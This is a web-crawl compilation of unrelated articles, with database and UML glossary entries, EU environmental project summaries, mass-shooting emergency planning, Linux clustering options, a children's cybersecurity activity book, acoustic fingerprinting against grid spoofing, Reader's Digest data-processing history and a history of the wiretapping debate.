include IBM MQSeries and Sun JMQ. A standard MOM application programming interface for Java, called Java Messaging Service (JMS) has been proposed by Sun. - Message Transport - An abstract service provided by a MOM system in the case of EAI, or by the agent management platform to which the agent is (currently) attached in the case of a FIPA-compliant interoperability solution. The message transport service provides for the reliable and timely delivery of messages to their destination agents, and also provides a mapping from logical names to physical transport addresses. - OLAP Application Online Analytical Processing - applications allow to evaluate large data sets by means of sophisticated techniques, such as statistical methods and data mining techniques. They typically run on top of a data warehouse system. - OLTP System Online Transaction Processing - systems are able to process a large number of concurrent database query and update requests in real time. The information technology part of a business transaction is called an online transaction, or simply `transaction'. It is performed through the execution of an application program that accesses one or more shared databases within the business information system. A transaction is a complex update operation consisting of a structured sequence of read and write operations. Ideally, a transaction satisfies the ACID properties. Business information systems are primarily OLTP systems. In almost every sector - manufacturing, education, health care, government, and large and small businesses - OLTP application systems are relied upon for everyday administrative work, communication, information gathering, and decision making. The first OLTP application in widespread use was the airline reservation system SABRE developed in the early 1960s as a joint venture between IBM and American Airlines. This system connects several hundred thousand nodes (user interface devices) and has to handle several thousand update request messages per second. - Object-Relational Databases (ORDBs) - have evolved from relational databases by adding several extensions derived from conceptual modeling requirements and from object-oriented programming concepts. One can view the evolution of relational to object-relational databases in two steps. First, the addition of abstract data types (ADTs) allows complex-valued tables. ADTs include user-defined base types and complex types together with user-defined functions and type predicates, and the possibility to form a type hierarchy where a subtype of a tuple type inherits all attributes defined for it. Second, the addition of object identity, object references and the possibility to define subtables within an extensional subclass hierarchy allows object tables. There are two notable differences between object-relational databases and object-oriented programming. First, object IDs in ORDBs are logical pointers. They are not bound to a physical location (like C++ pointers). Second, in addition to the intensional subtype hierarchy of the type system, ORDBs have an extensional subclass (or subtable) hierarchy that respects the subtype relationships defined in their type system. ORDBs allow the seamless integration of multimedia data types and large application objects such as text documents, spreadsheets and maps, with the fundamental concept of database tables. Many object-relational extensions have been included in SQL-99. - Object-Oriented Database (OODB) - Historically, the successful application of object-oriented programming languages such as Smalltalk, C++ and Java, has led to the development of a number of so-called 'object-oriented database systems' which support the storage and manipulation of persistent objects. These systems have been designed as programming tools to facilitate the development of object-oriented application programs. However, although they are called database systems, their emphasis is not on representing information by means of tables but rather on persistent object management. Any database concept which is intended as an implementation platform for information systems and knowledge representation must support tables as its basic representation concept on which query answering is based. Tables correspond to extensional predicates, and each table row corresponds to a proposition. This correspondence is a fundamental requirement for true database systems. If it is violated, like in the case of OODBs, one deals with a new notion of database system, and it would be less confusing to use another term instead (e.g. persistent object management system) as proposed by (Kim95). - An ontology explicitly specifies the terms for expressing queries and assertions about a domain in a way that is formal, objective, and unambiguous. This includes the stipulation of terminological relationships and constraints in order to capture key aspects of the intended meaning of the specified terms. An ontology is implicitly defined by a conceptual model (such as an ER or UML model). Communication between agents can only be successful if it is based on a common (or shared) ontology. - A protocol defines the admissible patterns of a particular type of conversation or interaction between agents. Notice that an interaction protocol refers to the communication acts and high-level actions available to agents, whereas a networking protocol refers to message transport mechanisms such as TCP/IP. - Reaction Rule - SQL databases support a restricted form of reaction rules, called triggers. Triggers are bound to update events. Depending on some condition on the database state, they may lead to an update action and to system-specific procedure calls. In (Wag98) a general form of reaction rules, subsuming production rules and database triggers (or 'event-condition-action rules') as special cases, was proposed. Reaction rules can be used to specify the communication in multi-databases and, more generally, the inter operation between communication-enabled application systems. - Relational Database (RDB) - Already in 1970, Edgar F. Codd published his pioneering article "Relational Model of Data for Large Shared Data Banks" in the Communications of the ACM, where he defined the principles of the relational database model. This was the first convincing conceptualization of a general purpose database model, and it is not an accident that it relies on formal logic providing a clear separation of the conceptual user interface and the underlying implementation techniques. In the mid-eighties, IBM presented DB2, the first industrial-strength implementation of the relational model, which continues to be one of the most successful systems today. There are now numerous other relational DBMSs that are commercially available. The most popular ones include Informix, Oracle, Sybase and Microsoft SQL Server. To a great extent, the overwhelming success of these systems is due to the standardization of the database manipulation language SQL originally developed at IBM in the seventies. While most well-established information processing systems and tools such as pro gramming languages, operating systems or word processors have evolved from practical prototypes, the unprecedented success story of the relational database model is one of the rare examples where a well-established and widely used major software system is based on a formal model derived from a mathematical theory (in this case set theory and mathematical logic). Conceptually, a relational database is a finite set of finite set-theoretic relations (called 'tables') over elementary data types, corresponding to a finite set of atomic propositions. Such a collection of atomic sentences can also be viewed as a finite interpretation of the formal language associated with the database in the sense of first order predicate logic model theory. The information represented in a relational database is updated by inserting or deleting atomic sentences corresponding to table rows (or tuples of some set-theoretic relation). Since a relational database is assumed to have complete information about the domain represented in its tables, if-queries are answered either by yes or by no. There is no third type of answer such as unknown. Open queries (with free variables) are answered by returning the set of all answer substitutions satisfying the query formula. - There are various types of rules: business rules, legal rules, calculation rules, derivation rules, production rules, rules of thumb, reaction rules, and many more. - is a declarative language for defining, modifying and querying database tables. A table schema is defined with the command CREATE TABLE... and modified with ALTER TABLE... The content of a table can be modified by either adding, deleting, or changing rows using the commands INSERT INTO... , DELETE FROM... and UPDATE... Simple queries are formed with the expression WHERE condition. Such a query combines the cross product of tables with the selection defined by condition and the final projection to the attributes occurring in columns. More complex queries can be formed by nesting such SELECT statements (using sub queries in the WHERE clause), and by combining them with algebraic operators such as JOIN, UNION, EXCEPT. SQL queries correspond to relational algebra expressions and to predicate logic formulas: projection corresponds to existential quantification, join to conjunction, union to disjunction, and difference ( EXCEPT) to negation. The most recent version of SQL, SQL-99, includes many object-relational extensions, such as user-defined types for attributes, object references, and subtable definitions by means of CREATE TABLE subtable - is a networking protocol used to establish connections and transmit data between hosts. - Unified Modeling Language (UML) - is an established object-oriented modeling standard defined by an industry initiative organized and funded by Rational and led by three prominent figures of the OO modeling community: Booch, Jacobson, and Rumbaugh. UML recognizes five distinct modeling views: the use-case view for requirements analysis, the logical view for describing the static structure and the behavior of a system, and three implementation views regarding components, concurrency and deployment. Each of these views is composed of several diagrams. A use-case diagram depicts a complete sequence of related transactions between an external actor and the system. The idea is that, by going through all of the actors associated with a system, and defining everything they are able to do with it, the complete functionality of the system can be defined. UML class diagrams are a straight-forward extension of ER diagrams. In addition to conventional (stored) attributes, class diagrams also list the operations of a class which may be functions (derived attributes) or service procedures associated with the class. The behavior of a system is modeled by means of four types of diagram: sequence diagrams depict the message exchange between objects arranged in time sequence, where the direction of time is down the page; an alternative way of visualizing the message exchange between objects is offered by collaboration diagrams emphasizing the associations among objects instead of the time sequence; activity diagrams are used for describing concurrent, asynchronous processing; finally, state charts allow to represent the state transitions of a system.
<urn:uuid:25dfe037-912c-4665-a045-04f673071e59>
CC-MAIN-2017-09
http://baanboard.com/node/48?s=35ad7fdbaf76ecc9d2f418e63de1eec9
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501172156.69/warc/CC-MAIN-20170219104612-00544-ip-10-171-10-108.ec2.internal.warc.gz
en
0.929832
6,001
2.6875
3
In software project management, software testing, and software engineering, verification and validation (V&V) is the process of checking that a software system meets specifications and that it fulfills its intended purpose. It may also be referred to as software quality control. It is normally the responsibility of software testers as part of the software development lifecycle. In simple terms, software verification is: "Assuming we should build X, does our software actually achieve its goals without any bugs or gaps?" On the other hand, software validation is: "Was X actually what we should have built? Does X actually meet the high level requirements?"
<urn:uuid:e98f160d-d1fc-405f-a0e1-62b64ec496cb>
CC-MAIN-2017-09
http://colsa.com/softwareverification.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501172156.69/warc/CC-MAIN-20170219104612-00544-ip-10-171-10-108.ec2.internal.warc.gz
en
0.935997
124
2.796875
3
CEOP-AEGIS - Coordinated Asia-European long-term Observing system of Qinghai Tibet Plateau hydro-meteorological processes and the Asian-monsoon systEm with Ground satellite Image data and numerical Simulations Agency: Cordis | Branch: FP7 | Program: CP-SICA | Phase: ENV.2007.4.1.4.2. | Award Amount: 4.46M | Year: 2008 Human life and the entire ecosystem of South East Asia depend upon the monsoon climate and its predictability. More than 40% of the earths population lives in this region. Droughts and floods associated with the variability of rainfall frequently cause serious damage to ecosystems in these regions and, more importantly, injury and loss of human life. The headwater areas of seven major rivers in SE Asia, i.e. Yellow River, Yangtze, Mekong, Salween, Irrawaddy, Brahmaputra and Ganges, are located in the Tibetan Plateau. Estimates of the Plateau water balance rely on sparse and scarce observations that cannot provide the required accuracy, spatial density and temporal frequency. Fully integrated use of satellite and ground observations is necessary to support water resources management in SE Asia and to clarify the roles of the interactions between the land surface and the atmosphere over the Tibetan Plateau in the Asian monsoon system. The goal of this project is to: 1. Construct out of existing ground measurements and current / future satellites an observing system to determine and monitor the water yield of the Plateau, i.e. how much water is finally going into the seven major rivers of SE Asia; this requires estimating snowfall, rainfall, evapotranspiration and changes in soil moisture; 2. Monitor the evolution of snow, vegetation cover, surface wetness and surface fluxes and analyze the linkage with convective activity, (extreme) precipitation events and the Asian Monsoon; this aims at using monitoring of snow, vegetation and surface fluxes as a precursor of intense precipitation towards improving forecasts of (extreme) precipitations in SE Asia. A series of international efforts initiated in 1996 with the GAME-Tibet project. The effort described in this proposal builds upon 10 years of experimental and modeling research and the consortium includes many key-players and pioneers of this long term research initiative. Agency: Cordis | Branch: H2020 | Program: RIA | Phase: SFS-02a-2014 | Award Amount: 7.97M | Year: 2015 FATIMA addresses effective and efficient monitoring and management of agricultural resources to achieve optimum crop yield and quality in a sustainable environment. It covers both ends of the scale relevant for food production, viz., precision farming and the perspective of a sustainable agriculture in the context of integrated agri-environment management. It aims at developing innovative and new farm capacities that help the intensive farm sector optimize their external input (nutrients, water) management and use, with the vision of bridging sustainable crop production with fair economic competitiveness. Our comprehensive strategy covers five interconnected levels: a modular technology package (based on the integration of Earth observation and wireless sensor networks into a webGIS), a field work package (exploring options of improving soil and input management), a toolset for multi-actor participatory processes, an integrated multi-scale economic analysis framework, and an umbrella policy analysis set based on indicator-, accounting- and footprint approach. FATIMA addresses and works with user communities (farmers, managers, decision makers in the farm and agribusiness sector) at scales ranging from farm, over irrigation scheme or aquifer, to river-basins. It will provide them with maps of fertilizer and water requirements (to feed into precision farming machinery), crop water consumption and a range of further products for sustainable cropping management supported with innovative water-energy footprint frameworks. All information will be integrated in leading-edge participatory spatial online decision-support systems. The innovative FATIMA service concept considers the economic, environmental, technical, social, and political dimensions in an integrated way. FATIMA will be implemented and demonstrated in 8 pilot areas representative of key European intensive crop production systems in Spain, Italy, Greece, Netherlands, Czech Republic, Austria, France, Turkey. Agency: Cordis | Branch: FP7 | Program: CP | Phase: SPA.2010.1.1-04 | Award Amount: 3.04M | Year: 2010 SIRIUS addresses efficient water resource management in water-scarce environments. It focuses in particular on water for food production with the perspective of a sustainable agriculture in the context of integrated river-basin management, including drought management. It aims at developing innovative and new GMES service capacities for the user community of irrigation water management and sustainable food production, in accordance with the vision of bridging and integrating sustainable development and economic competitiveness. SIRIUS merges two previously separate strands of activities, those under the umbrella of GMES, related to land products and services (which address water to some extent), and those conducted under FP5/6-Environment and national programs, related to EO-assisted user-driven products and services for the water and irrigation community. As such, it will draw on existing GMES Core Services as much as possible, by integrating these products into some of the required input for the new water management services.It also makes direct use of the EO-assisted systems and services developed in the FP6 project PLEIADeS and its precursor EU or national projects, like DEMETER, IRRIMED, ERMOT, MONIDRI, AGRASER, all addressing the irrigation water and food production sectors, some of which have resulted in sustainable system implementation since 2005. SIRIUS addresses users (water managers and food producers) at scales ranging from farm, over irrigation scheme or aquifer, to river-basins. It will provide them with maps of irrigation water requirements, crop water consumption and a range of further products for sustainable irrigation water use and management under conditions of water scarcity and drought, integrated in leading-edge participatory spatial online Decision-support systems. The SIRIUS service concept considers the economic, environmental, technical, social, and political dimensions in an integrated way.
<urn:uuid:5dc10ba2-ed85-4f2e-adbc-37f55d846688>
CC-MAIN-2017-09
https://www.linknovate.com/affiliation/ariespace-srl-600619/all/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501174135.70/warc/CC-MAIN-20170219104614-00068-ip-10-171-10-108.ec2.internal.warc.gz
en
0.902302
1,281
2.65625
3
A rapid, safe and successful response to a mass shooting incident requires preparation. The likelihood of a mass shooting is low, but schools, colleges and public safety officials must prepare for these situations. Recent mass shootings have demonstrated the need to prepare local, regional, state and federal resources for these events. Emergency managers and public safety agencies must adapt to society's changes so that appropriate delivery of emergency services is ensured in a crisis. The guidelines and procedures discussed here should not replace common sense and experience. It's impossible to plan for every situation that may occur. New best practices and lessons learned are available on an ongoing basis. These emergency response plans should be updated regularly. The goal of this article is to prepare first responders, emergency managers, school officials and others with the basic tools and information needed to develop or assess a multiagency plan for preparing and responding to a mass shooting. Emergency management, law enforcement, fire and emergency medical services (EMS) all share some of the same priorities during a mass shooting, and these include safety and incident stabilization. Therefore, planning and interagency cooperation should be paramount for all types of critical incidents. There is tremendous need for a coordinated effort among all agencies to ensure a safe and effective response. No two shootings are the same, though responder safety is paramount during this type of event. Factors like the shooter's motive, his or her weapons, knowledge of the location and number of staff and visitors can all influence an incident's outcome. Preparation is the key and it includes a clear idea of your actions before the incident occurs. The first step of preparation is a review of your jurisdiction's guidelines and procedures - if they exist - for responding to a mass shooting. Another important step is to bring all the key agencies together, such as law enforcement, fire, EMS, emergency management, hospitals, school systems and colleges. Every jurisdiction, big or small, should have a Local Emergency Planning Committee or a Terrorism Task Force in order to provide a foundation for this planning effort. As with any multihazard assessment and planning process, it's a great idea to do a multiagency exercise (i.e., tabletop or functional) that brings all the key agencies together and rehearses the plan. Initially all the critical agencies should meet to discuss the planning effort for these types of events. One of the first steps this group can take is "target identification" for a mass shooting event that includes elementary schools, high schools, colleges and universities, and high-profile businesses.
<urn:uuid:51e6deb5-68ad-444e-a7f5-e4f74c9e3160>
CC-MAIN-2017-09
http://www.govtech.com/public-safety/Responding-to-Mass-Shootings-Takes-Planning.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170404.1/warc/CC-MAIN-20170219104610-00488-ip-10-171-10-108.ec2.internal.warc.gz
en
0.939879
505
3.171875
3
Learn Your Linux Clustering Options "Cluster" is probably the most heavily abused term in the computing world. In this article we'll talk about what a cluster really is, and give an overview of the Linux technologies that can help you implement various types of clusters. The main focus will of course be on building clusters for highly available services. There are three basic types of clustering technologies, and each of them cluster resources in a different manner, at a different level. High Performance Computing uses clusters to gain absurd computational capacity. Scyld is an example of HPC clustering, and so is LAM/MPI and MPICH. The MPI-based clusters require an application that can take advantage of the cluster. HPC is for computationally intensive tasks, where the tasks can be broken up into many tasks, for execution on various nodes. Your standard single-threaded application won't run on these clusters. Scyld-like clusters are similar, in that they require your application to be spawning many compute tasks, but Scyld will present the cluster as a single machine. On the head node, or master, you will see every single process that's running on the various nodes—it's quite cool! This does mean that you'll be running a custom-built kernel, of course. But the real question is how to set up a cluster to attain redundant and highly available services. Especially services that are potentially a single-point-of-failure, like NFS servers, e-mail servers, and Web servers. There are two options. High Availability clusters are focused on redundancy. If a critical server explodes, a standby can take over instantly. This is normally accomplished by having the standby server monitor with something as simple as a ping, or as complex as a program to check that the specific service is responding properly. The linux-HA project provides the Heartbeat program, which is used by standby servers to verify the health of the active server. It also provides failover functionality and IP address management. There are problems with HA configurations, however. In a perfect world, we could just throw up two NFS servers with access to the same storage, and let them fight it out. This doesn't work, but there are cluster-aware file systems that allow multiple active nodes to utilize the storage simultaneously. Throwing databases at clusters is troublesome as well, since data can be left in an inconsistent state when one node fails. Sun Cluster, Linux-HA, and Piranha are all examples of highly available cluster technologies. Load Balancing is where one point of contact will dole out jobs to other nodes. The master node can be a single point of failure, so HA clustering is normally used to provide redundant head nodes. Load balancing doesn't even have to be about "clustering." It can be done with network equipment as well as software. Software-based solutions are normally a bit smarter, however; they can monitor the load and responsiveness of the backend nodes, and then send traffic to the most available server. The most widely known load balancing cluster product is the Linux Virtual Server project, or LVS. LVS operates at a higher level than other technologies. Instead of trying to provide a transparent set of nodes to run processes on, it load balances at the network level. The advantage is that nearly anything can be run on an LVS cluster, assuming it communicates via TCP or UDP. Piranha, the Red Hat cluster software, uses LVS as well. LVS is really just a glorified proxy server, when you think about it. It does operate at layer 4, though, so it doesn't need to understand the layer 7 protocols you're trying to balance, which is a great advantage. So the question remains: what method of clustering should one use? It really depends on the goals of the server. If you want to implement an NFS server cluster, you're in for a world of hurt. For many reasons, the foremost being locking, and the fact that NFS isn't really stateless, means that you will run into problems. To implement a cluster with a shared file system you really must invest in something like GFS or Veritas. Most often, people are looking for a way to provide a cluster of Web, mail, or other similar servers. The solution is usually going to be something LVS related, if not LVS. TurboLinux Cluster, Red Hat High Availability Server, and many others all use LVS. Kimberlite does not use LVS, and it seems highly recommended by numerous people. Kimberlite runs services in a highly available active-active configuration, with shared storage. When one node is unavailable, the other starts up the missing services and keeps plugging along. And wouldn't you know, there are probably 50 other cluster options that we haven't mentioned here. The most common are LVS and Linux-ha, and note that Linux-ha.org is quite different from Linuxha.net. Yes it is quite confusing. SUSE Linux ships with Linux-HA (Heartbeat) installed and ready to use. Red Hat Cluster is another option, and of course rolling your own solution using the myriad of available technologies is yet another option. Just remember to read and understand the drawbacks and limitations of the cluster solution you choose—they all have limitations.
<urn:uuid:e627c677-e3a5-421e-b012-28c4c1c2d3a2>
CC-MAIN-2017-09
http://www.enterprisenetworkingplanet.com/print/netos/article.php/3679891/Learn-Your-Linux-Clustering-Options.htm
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170700.71/warc/CC-MAIN-20170219104610-00012-ip-10-171-10-108.ec2.internal.warc.gz
en
0.941924
1,101
3.15625
3
The Cynja Field Instruction Manual An activity book for trainee cyberheroes! Book Overview Summary Today, our battlefield is a new frontier, one that’s invisible to all but those with cyber powers. It’s time to train a new kind of superhero – one who will protect cyberspace from attack! Join the Cynsei, as he helps you acquire cyber powers to fight zombies, worms and botnets. The world needs boys & girls with the digital smarts to become Cynjas and keep the Internet safe for all. Crack open The Cynja Field Instruction Manual and learn how to be a cyberhero! About the Book A companion activity book for The Cynja Volume 1, The Cynja Field Instruction Manual is a place where kids can practice the lessons learned from their favorite cyberheroes. Our kids today are living in a digital world where they need the smarts and savvy to navigate the increasing threats they’ll face online. Authors Heather C. Dahl and Chase Cunningham, along with artist Shirow Di Rosso have all worked in the cybersecurity industry and designed these fun activities inside this Manual to teach digital life skills to kids and inspire the next generation of real-life information security warriors. Stories, puzzles, coloring pages, mazes…these are cool interactive methods to give kids hand-on experience with the fundamental technology concepts introduced in Volume 1. The Field Instruction Manual is the perfect activity book for any kid interested in computers, any adult who loves puzzles and games, and moreover is an awesome resource for anyone who wants to learn more about cybersecurity. “The team behind this new activity book wants kids to become Cynjas—a mashup of the words cyber and ninja—in order to keep the Internet safe for all. The book combines high energy coloring pages and hands-on crafts created by illustrator and IT engineer Shirow Di Rosso, along with educational exercises like password creation, malware identification and a four-page spread focused on the history of computers.” “The kids in our lives were spending their time coloring activity books about old-school bad guys like dragon slayers even though digital monsters were invading their computers,” said co-author and tech researcher Heather C. Dahl. “So we decided it was time to give the coloring book an upgrade and create a fun manual that could teach kids a really valuable life lesson—how to make smart choices in cyberspace.” The Cynja Field Instruction Manual follows on The Cynja Volume 1 and encourages kids practice the “super cyber powers” they learned in the author’s debut book. The creators have garnered consistent high praise for their clever storytelling, superb illustrations and for “filling a gap in children’s literature” with their “geekily accurate” narrative. “I created The Cynja book series for my two daughters. It’s important for my girls and kids to learn more about cybersecurity,” explained co-author and threat intelligence analyst Chase Cunningham. “We’re facing a shortage of professionals in my industry, so my hope is The Cynja Field Instruction Manual might inspire some of its young readers to join me in fighting bad guys online.” - Help Net Security
<urn:uuid:a6b427ee-9b71-4838-8d80-81e90fefcd6b>
CC-MAIN-2017-09
https://www.cynja.com/shop/the-cynja-field-instruction-manual/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170700.71/warc/CC-MAIN-20170219104610-00012-ip-10-171-10-108.ec2.internal.warc.gz
en
0.92539
672
2.609375
3
If you want to highlight certain points or ideas in your PowerPoint presentation but the laser pointer isn’t quite cutting it, you can try another tactic. Here’s how to draw on your presentation to help get your point across. - First, you have to be in Slide Show mode. Head to Slide Show at the top of your screen > From Beginning. - Once you’ve got your slides running, use the keyboard shortcut CTRL+P in order to access the pen. - It’s going to just look like a small dot, but if you click and hold down with your mouse, you can draw on your slides. - You can use it to draw arrows on the fly, or circle important content to help make things clear to people. You can also draw pictures to help explain things (if that happens to be a skill of yours!) - To erase, just hit “E” and you’ll erase the last thing you’ve drawn. - To hide the pen, just hit CTRL+H. Click here to watch this video on YouTube.
<urn:uuid:4905ddba-e8dd-4929-b392-e1cfc8a1d544>
CC-MAIN-2017-09
https://www.bettercloud.com/monitor/the-academy/how-to-doodle-on-your-powerpoint-presentation/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170992.17/warc/CC-MAIN-20170219104610-00188-ip-10-171-10-108.ec2.internal.warc.gz
en
0.86942
229
3.28125
3
ZIFFPAGE TITLEA Hex in ComputingBy Tom Steinert-Threlkeld | Posted 2005-07-08 Email Print Decades before the idea took hold in the dot-com era, Reader's Digest kept a "360-degree view" of each of its customerstracking every contact it ever had with a subscriber to its magazine or a purchaser of any of its condensed books or o A Hex in Computing The practical reality, in the early days, was much more prosaic. There wasn't much discussion of "data warehousing" or "data mining" or anything you might want to call "business intelligence.'' In fact, before the Univac II came along, Reader's Digest's data warehouse consisted of 18 million stencils, little metal plates with subscribers' names, addresses and expiration dates on the front. They were used to create mailing labels, by pressing ink on them. Their edges were notched, to add marketing information to stencils selected for marketing campaigns. Several rooms in the company's headquarters were devoted to this "prehistoric" system, as Otten terms it. About 100 women and men would toil in a stencil room, making sure each stencil was in the right sequence in the right tray for the right postal code. And, once removed, returned to its right place. What they couldn't do was easily put customers in buckets they could do something with, like sell customers a new book or record. Or just simply put names in alphabetical order without shuffling cards by hand. With the new file system and the battery of IBM 360s, they finally had a way of putting order into the universe. "It was wonderfully awesome to do a sort of 10 million names,'' Burns says. Being able to sort millions of records by name, state or street address was not the point. Figuring out what prompted each customer to buy more products was the mystery worth solving. For Burns and 29 other programmers, that meant devising a schema that would compact a record of any offer made to any customer in an "atomic record" of four bytes per event. One byte would record the name of the product; a second the action that resulted (promoted, paid bill, canceled, etc.); a third the type of marketing effort (direct mail piece, house ad, etc.) that spurred the action; and another the month and year of the mailing or other marketing campaign. Each byte mattered in an era of expensive hardware and expensive memory. IBM had spent $5 billion in 1964 ($28 billion in today's dollars) just to launch the 360. In fact, Reader's Digest programmers had to figure out how to squeeze lots of information into fields that might only be one byte long. That meant writing in hexadecimal code, an approach taken to maximize use of the limited memory of the IBM machines. "That was the nature of the beast,'' Otten says. Everyday math is based on decimal code: the numbers 0 through 9. The base is 10: the characters you know as numbers. Hexadecimal code takes those 10 numbers and adds six letters. Readers' Digest chose A through F. With decimal code, you can store only 100 different values in two digits: 10 times 10. With hexadecimal code, you can store 256 different values: 16 times 16. Which happens to be the maximum amount of information that can be stored in a byte. IBM, with the 360, established the standard in the computing industry that a byte would be the equivalent of eight bits of information fed to a machine at a time. Those bits were ones or zeroes. Two different values, eight digits, multiplied into all their possible permutations equals256. So, November 1987 would become 1C. November 1994 would be 70 and November 2004 was E8. More than two decades of months and years could be captured in 256 two-character combinations. How could you tell what E8 meant? By looking it up in a table, kept on paper. Or in one's head. Kahrs and Ritchie, the two lead developers, would define much of the foundation of the system, such as what values to put in the compacted fields. Did you need hex codes for active customers? Expired? Deadbeat? Temporary? Gift recipient? But everyday "users" of the system wouldn't have to know hex code, project manager Otten decided. Key Reader's Digest policies, such as when to stop shipping products to a particular customer, subscription rates and who was entitled to which rate, would be kept in tables that could be pulled up on screen, altered and fed back into the system. That separation of business purposeand putting it on screen in a form an everyday worker could see and deal withwas "unique" in a period when only gods working in air-conditioned rooms with raised floors could be experts in computing, according to Burns. "To think of the system user was quite advanced,'' he says. Until then, dabbling in hex code or putting it to any kind of use "was strictly up the Mr. Wizards and the Mrs. Wizards."
<urn:uuid:d337a9b4-4243-4282-8409-4991db5b8f98>
CC-MAIN-2017-09
http://www.baselinemag.com/c/a/Projects-Data-Analysis/Readers-Digest-The-Longest-Goodbye/2
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171932.64/warc/CC-MAIN-20170219104611-00064-ip-10-171-10-108.ec2.internal.warc.gz
en
0.963205
1,063
2.65625
3
A kind of fingerprinting, using the unique noises that emanate from hybrid cyber-physical systems could be used to thwart large-infrastructure attacks that some experts think are a danger. Fake, malicious control commands injected into electrical grids and other large-scale hybrid physical and cyber installations could devastate systems. But existing control equipment sometimes can’t run encryption; is often remote, therefore hard to patch frequently; and can lack redundancy, so needs to be kept running. It can’t be shut down to be updated like regular networks. Scientists think that one answer is to harness a major advantage of physical-cyber hybrid equipment—which is that the industrial control performs a physical action, such as turning a valve, or motor on. The action not only creates a unique sound, but also takes a specific amount of time to be performed. The theory is that by knowing what the characteristics should be, anomalies can get spotted—such as a spoofing. “The stakes are extremely high,” Raheem Beyah, an associate professor in the School of Electrical and Computer Engineering at the Georgia Institute of Technology, says on the school’s website. “But the systems are very different from home or office computer networks,” he explains. In the proposed fingerprinting, the scientists use “physics and mathematics to analyze and build a model” based on the equipment, Beyah says. “Schematics and specifications allow us to determine how the devices are actually operating,” he says. The team creates computer models to understand the unique device fingerprint. So far, they say they’ve addressed half of the devices used on the electrical grid and reckon they’ve demonstrated that their concept works at two electrical substations. The sound and time it takes for a control to perform an action “passively fingerprints different devices that are part of critical infrastructure networks.” Beyah says. It’s not the first time that sound has been used to identify things in an industrial context. Sound monitoring is used to predict mechanical failure too. Connecting vibration and ultrasonic Internet of Things sensors to machines lets algorithms predict problems based on the sound the machine makes. I wrote about that equipment last year. If you know what the machine should sound like, and it doesn’t sound right, you know there’s a problem. I used the analogy of a washing machine spin cycle that’s been overloaded. It sounded a lot different to one with the right number of towels in it. That idea is similar to the Georgia Institute of Technology fingerprinting. The spoof doesn’t sound right, or take the correct amount of time. It’s thus bogus. Beyah reckons his team’s idea also applies to Internet of Things. Those IoT devices have “specific signatures related to switching them on and off,” the Georgia Tech website explains. “There will be a physical action occurring, which is similar to what we have studied with valves and actuators” in the electrical grid scenario, says Beyah. So conceivably small IoT devices could ultimately see future cyber protections that don’t involve chip-hogging software. All one might need for IoT security, ultimately, is an adjacent microphone sensor and clock chip, along with a set of algorithms. This article is published as part of the IDG Contributor Network. Want to Join?
<urn:uuid:b9e3d40a-4fd8-4311-9393-f681f47574ba>
CC-MAIN-2017-09
http://www.networkworld.com/article/3040184/security/how-sound-fingerprinting-could-spot-grid-attackers.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171932.64/warc/CC-MAIN-20170219104611-00064-ip-10-171-10-108.ec2.internal.warc.gz
en
0.940219
713
3.015625
3
The leader in Eavesdropping Detection and Counterespionage Consulting services for business & government, since 1978. James Lawrence Fly, Winter 1999 — The Historian by Mickie Edwardson The use of wiretaps as an investigative tool by government and law enforcement agencies has long been a controversial issue in the United States. According to Birkenstock, wiretapping has been practiced “almost as long as there have been wires to tap.”1 While proponents defend the practice as necessary for effective crime control and intelligence gathering, others associate wiretapping with such Bill of Rights violations as illegal search and seizure, self-incrimination, and denial of fair trail. One way to gain understanding of the arguments used during the 80 year debate is through the writings and testimony of James Lawrence Fly (1898-1966), who campaigned against the practice during his years as Federal Communications Commission Chairman (1939-1944) and later as a practicing attorney and a director of the American Civil Liberties Union. For 16 years Fly waged his war in congressional hearings and courts, magazines, newspapers, and network television. Aside from providing knowledge of issues, Fly’s campaign enhances understanding of governmental processes in three ways. First, the fight over wiretapping shows how fear in national emergencies can overcome civil libertarians’ arguments and even Supreme Court verdicts to perpetuate a practice that is almost universally regarded with suspicion. Fly’s campaign occurred during two such emergencies, World War II and the Cold War. As the century ends, terrorism is causing similar fear, and lawmakers continues to introduce bills to make wiretapping easier for law enforcers. In addition, new wiretapping techniques have arisen from electronic advances such as telephone digital switching systems, cellular telephone, and encryption computer software. Whereas in Fly’s time most wiretaps were designed to uncover evidence of crime, since then emphasis has shifted, and many taps are designed for foreign surveillance in which crime is less central.2 Examining the wiretapping controversy over the period of Fly’s involvement also shows how legal constraints and social attitudes have changed; even Fly reluctantly came to acknowledge the utility of wiretapping under certain circumstances. Most debates about proposed wiretapping laws centered on four questions: Who should be authorized to approve a tap? How much suspicion justified a tap? What procedures should be followed? And what were the consequences for citizens? Another important issue was whether information from taps could be used as evidence in federal court and under what circumstances. As the nation’s interests became more complex, proponents of wiretapping spent five decades specifying conditions under which taps would be permissible. Fly’s story illustrates how government policy can evolve from a simple prohibition to a complex accommodation of competing concerns.3 Finally, Fly’s campaign illustrates the hazards officials face when they take unpopular stands. He suffered from newspaper columnists questioning his loyalty, from a federal board declaring him a hidden Communist, from congressional committees, and even difficulties with private business affairs. The punishment Fly suffered makes it easier to understand the silence of many public servants when facing controversy. Fly’s greatest single adversary during the struggle was Federal Bureau of Investigation Director J. Edgar Hoover. Hoover wrote that Roosevelt as early as 1936 had given the FBI responsibility for gathering intelligence on Fascists and Communists. Fly and Hoover first clashed in September 1940, when Hoover asked the FCC to monitor all long-distance telephone calls passing through New York to or from Germany, France, Italy, and the territories occupied by German and Italian forces. Twice more that fall Hoover asked Fly to intercept and translate cables and coded material. Fly answered that he had given much thought to the requests, but “both legal and administrative difficulties are presented which involve consideration of a number of factors.”4 One legal difficulty Fly doubtless had in mind was the ban on wiretapping in Section 605 of the Communications Act of 1934. In a Washington Post op-ed article, he quoted the meat of the section which was at that time a blunt, unqualified prohibition: “No person not being entitled thereto shall receive ... any interstate...communication by wire or radio and use the same for his own benefit or for the benefit of another not entitled thereto.”5 Another often-violated provision, as Fly condensed it in a letter to president Roosevelt, was that “No person...shall intercept any communication and divulge [it] to any person.”6 An early effort to weaken Section 605 came in 1941 when Congressman Sam Hobbs of 